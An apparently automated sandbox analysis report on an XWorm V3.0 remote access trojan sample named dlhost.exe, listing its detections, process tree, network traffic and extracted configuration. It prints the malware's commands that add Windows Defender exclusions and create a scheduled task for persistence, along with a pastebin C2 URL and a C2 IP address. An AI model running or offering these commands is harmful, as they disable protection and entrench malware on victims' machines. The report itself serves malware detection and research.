Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dlhost.exe

Overview

General Information

Sample name:dlhost.exe
Analysis ID:1578052
MD5:3a9a50e33aae389d9d1a718047be1aab
SHA1:88b1e5988a7822449e2a64fa24932ae569490665
SHA256:cd30142176ccd3f4be40617e7cc825fff1737eee4d5b1f64f58ecf101e58134b
Tags:exeXWormuser-lontze7
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dlhost.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\dlhost.exe" MD5: 3A9A50E33AAE389D9D1A718047BE1AAB)
    • powershell.exe (PID: 744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dlhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\dlhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5572 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "dlhost" /tr "C:\Users\user\dlhost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dlhost.exe (PID: 320 cmdline: "C:\Users\user\dlhost.exe" MD5: 3A9A50E33AAE389D9D1A718047BE1AAB)
  • dlhost.exe (PID: 2952 cmdline: "C:\Users\user\dlhost.exe" MD5: 3A9A50E33AAE389D9D1A718047BE1AAB)
  • dlhost.exe (PID: 1476 cmdline: C:\Users\user\dlhost.exe MD5: 3A9A50E33AAE389D9D1A718047BE1AAB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/ct3KF8KR"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
dlhost.exeJoeSecurity_XWormYara detected XWormJoe Security
    dlhost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      dlhost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xdb5f:$s6: VirtualBox
      • 0xdabd:$s8: Win32_ComputerSystem
      • 0xffcd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1006a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1017f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xf758:$cnc4: POST / HTTP/1.1

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\dlhost.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\dlhost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\dlhost.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xdb5f:$s6: VirtualBox
          • 0xdabd:$s8: Win32_ComputerSystem
          • 0xffcd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x1006a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x1017f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xf758:$cnc4: POST / HTTP/1.1

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xd95f:$s6: VirtualBox
            • 0xd8bd:$s8: Win32_ComputerSystem
            • 0xfdcd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xfe6a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xff7f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xf558:$cnc4: POST / HTTP/1.1
            00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              Process Memory Space: dlhost.exe PID: 4952JoeSecurity_XWormYara detected XWormJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.dlhost.exe.1a0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.0.dlhost.exe.1a0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.dlhost.exe.1a0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xdb5f:$s6: VirtualBox
                    • 0xdabd:$s8: Win32_ComputerSystem
                    • 0xffcd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1006a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x1017f:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0xf758:$cnc4: POST / HTTP/1.1

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dlhost.exe", ParentImage: C:\Users\user\Desktop\dlhost.exe, ParentProcessId: 4952, ParentProcessName: dlhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', ProcessId: 744, ProcessName: powershell.exe
                    Sigma detected: Change PowerShell Policies to an Insecure Level
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dlhost.exe", ParentImage: C:\Users\user\Desktop\dlhost.exe, ParentProcessId: 4952, ParentProcessName: dlhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', ProcessId: 744, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\dlhost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\dlhost.exe, ProcessId: 4952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dlhost
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dlhost.exe", ParentImage: C:\Users\user\Desktop\dlhost.exe, ParentProcessId: 4952, ParentProcessName: dlhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', ProcessId: 744, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\dlhost.exe", ParentImage: C:\Users\user\Desktop\dlhost.exe, ParentProcessId: 4952, ParentProcessName: dlhost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\dlhost.exe', ProcessId: 744, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-19T08:15:20.587797+010028559241Malware Command and Control Activity Detected192.168.2.54983091.200.220.1298000TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: dlhost.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\dlhost.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                    Found malware configuration
                    Source: dlhost.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/ct3KF8KR"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.0"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\dlhost.exeReversingLabs: Detection: 76%
                    Source: C:\Users\user\dlhost.exeVirustotal: Detection: 76%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: dlhost.exeVirustotal: Detection: 76%Perma Link
                    Source: dlhost.exeReversingLabs: Detection: 76%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\dlhost.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: dlhost.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: dlhost.exeString decryptor: https://pastebin.com/raw/ct3KF8KR
                    Source: dlhost.exeString decryptor: <123456789>
                    Source: dlhost.exeString decryptor: <Xwormmm>
                    Source: dlhost.exeString decryptor: USB.exe
                    Source: dlhost.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49755 version: TLS 1.2
                    Source: dlhost.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49830 -> 91.200.220.129:8000
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://pastebin.com/raw/ct3KF8KR
                    Connects to a pastebin service (likely for C&C)
                    Source: unknownDNS query: name: pastebin.com
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: dlhost.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.dlhost.exe.1a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: C:\Users\user\dlhost.exe, type: DROPPED
                    Source: global trafficTCP traffic: 192.168.2.5:49771 -> 91.200.220.129:8000
                    Source: global trafficHTTP traffic detected: GET /raw/ct3KF8KR HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.200.220.129
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /raw/ct3KF8KR HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: pastebin.com
                    Source: powershell.exe, 00000005.00000002.2239842410.000001BBB2239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000005.00000002.2239842410.000001BBB2239000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: dlhost.exe, dlhost.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000002.00000002.2141017616.0000029D9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223868189.000001BBA9B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2118222449.0000029D80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99CD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: dlhost.exe, 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2118222449.0000029D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCD8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.2118222449.0000029D80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99CD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000005.00000002.2239842410.000001BBB21AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 00000002.00000002.2149754162.0000029DF2B8A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2397434279.0000029CE5E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: powershell.exe, 00000002.00000002.2118222449.0000029D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2174126442.000001BB99AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2281703744.0000029CCD8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000008.00000002.2281703744.0000029CCDAD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000008.00000002.2394864480.0000029CE5D7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                    Source: powershell.exe, 00000002.00000002.2141017616.0000029D9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2223868189.000001BBA9B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2378911711.0000029CDD91F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: dlhost.exe, 0000000F.00000002.2728842132.0000000002811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/ct3KF8KR
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49755 version: TLS 1.2

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Users\user\Desktop\dlhost.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: dlhost.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.dlhost.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\dlhost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: C:\Users\user\Desktop\dlhost.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F16AD20_2_00007FF848F16AD2
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F15D260_2_00007FF848F15D26
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F11FF10_2_00007FF848F11FF1
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F11D5E0_2_00007FF848F11D5E
                    Source: C:\Users\user\Desktop\dlhost.exeCode function: 0_2_00007FF848F124CE0_2_00007FF848F124CE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8490130E78_2_00007FF8490130E7
                    Source: C:\Users\user\dlhost.exeCode function: 13_2_00007FF848F40DFE13_2_00007FF848F40DFE
                    Source: C:\Users\user\dlhost.exeCode function: 13_2_00007FF848F41D5E13_2_00007FF848F41D5E
                    Source: C:\Users\user\dlhost.exeCode function: 14_2_00007FF848F30DFE14_2_00007FF848F30DFE
                    Source: C:\Users\user\dlhost.exeCode function: 14_2_00007FF848F31D5E14_2_00007FF848F31D5E
                    Source: C:\Users\user\dlhost.exeCode function: 15_2_00007FF848F00DFE15_2_00007FF848F00DFE
                    Source: C:\Users\user\dlhost.exeCode function: 15_2_00007FF848F01D5E15_2_00007FF848F01D5E
                    Source: dlhost.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: dlhost.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 0.0.dlhost.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: 00000000.00000000.2030664560.00000000001A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: C:\Users\user\dlhost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: dlhost.exe, KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dlhost.exe, KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dlhost.exe, W6uuvYPTRyCFJKrvkGziObxpB02DPR6H5cliHkTHt0JNFUR0IRIFgU93094xnwVjZC383dwdnmJq3s98itX3KpCAEeMleMJR.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dlhost.exe.0.dr, KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dlhost.exe.0.dr, KJBjvTdOieJ2vS3ws7tZB9nFKNb65tboJZbkcrpB6A6DLB8v6Cag4PzRdu7y5WYHuCBcjfiZYBG1XRtHa9FCWkDSwZTSp8LW.csCryptographic APIs: 'TransformFinalBlock'
                    Source: dlhost.exe.0.dr, W6uuvYPTRyCFJKrvkGziObxpB02DPR6H5cliHkTHt0JNFUR0IRIFgU93094xnwVjZC383dwdnmJq3s98itX3KpCAEeMleMJR.csCryptographic APIs: 'TransformFinalBlock'
